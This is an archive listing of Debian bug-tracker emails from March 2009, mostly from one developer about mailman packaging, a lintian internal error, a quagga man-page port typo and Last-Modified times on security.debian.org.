# Automatically generated email from bts, devscripts version 2.10.35lenny3 # via tagpending # # mailman (1:2.1.12-2) UNRELEASED; urgency=low # # * Apply patch from Tanguy Ortolo updating postfix-to-mailman #instructions to avoid backscatter mail (Closes: #520040). # package mailman tags

Bug#520040: [Pkg-mailman-hackers] Bug#520040: mailman: postfix-to-mailman.py: use relay_recipient_maps to avoid backscatter mail

2009-03-21 Thread Thijs Kinkhorst
On Tuesday 17 March 2009, Tanguy Ortolo wrote: I think the most beautiful way to use Mailman with Postfix is to dedicate it a domain, and to use the specific transport to relay mail to it. But… as Postfix does not know the valid addresses, messages to invalid recipients are treated with

Bug#513988: [Pkg-mailman-hackers] Bug#513988: mailman/bin/update fails, but postinst ignores error

2009-03-15 Thread Thijs Kinkhorst
On Tuesday 3 February 2009, Lionel Elie Mamane wrote: IOError: [Errno 2] No such file or directory: '/var/lib/mailman/locks/mailman.lock.tofu.14934.0' Starting Mailman master qrunner: mailmanctl. This seems to happen still. I'd appreciate it if anyone could look into it. Thijs

Bug#518292: security.debian.org: Last-Modified times and lenny release

2009-03-05 Thread Thijs Kinkhorst
reassign 518292 ftp.debian.org thanks Hi Mark, On Thu, March 5, 2009 10:29, Mark Hindley wrote: I have just had a bug report for apt-cacher (#517874) which I have tracked down to the Last-Modified times on s.d.o. The file was

Bug#517899: internal error: command failed with error code 123 in collect info file-info

2009-03-03 Thread Thijs Kinkhorst
On Tuesday 3 March 2009, Russ Allbery wrote: Thijs Kinkhorst th...@debian.org writes: I get the following output when I check a mailman source package. $ lintian mailman_2.1.12-1.dsc Use of uninitialized value $_ in substitution (s///) at /usr/share/lintian/collection/file-info line 50

Bug#517860: wrong port number in zebra.8

2009-03-02 Thread Thijs Kinkhorst
Package: quagga Version: 0.99.11-1 Severity: minor Tags: patch Hi, The man page for zebra(8) mentions as port number to connect to 2602, but it's actually 2601 (as shown in /etc/services). 2602 belongs to ripd. Attached patch fixes this typo. thanks, Thijs diff -Nur

Bug#197779: mailman 'site' list should not be necessary

2009-03-02 Thread Thijs Kinkhorst
Mailman 3 removes the need for the site list. I concur that this is hence wontfix as the extra effort to remove it in Debian for 2.1 is not warranted. Thijs

Bug#176439: will not split package up

2009-03-02 Thread Thijs Kinkhorst
tags 176439 wontfix noowner 176439 thanks While I do agree with the principles outlined in these bugs that are pro split-up, I do not think we should do it at this point. Mailman 3 removes all arch-dep components, so a split is then not relevant anymore. I know MM 3 is not around the corner

Bug#517899: internal error: command failed with error code 123 in collect info file-info

2009-03-02 Thread Thijs Kinkhorst
Package: lintian Version: 2.2.6 Severity: normal Hi, I get the following output when I check a mailman source package. $ lintian mailman_2.1.12-1.dsc Use of uninitialized value $_ in substitution (s///) at /usr/share/lintian/collection/file-info line 50, INDEX line 1. Use of uninitialized
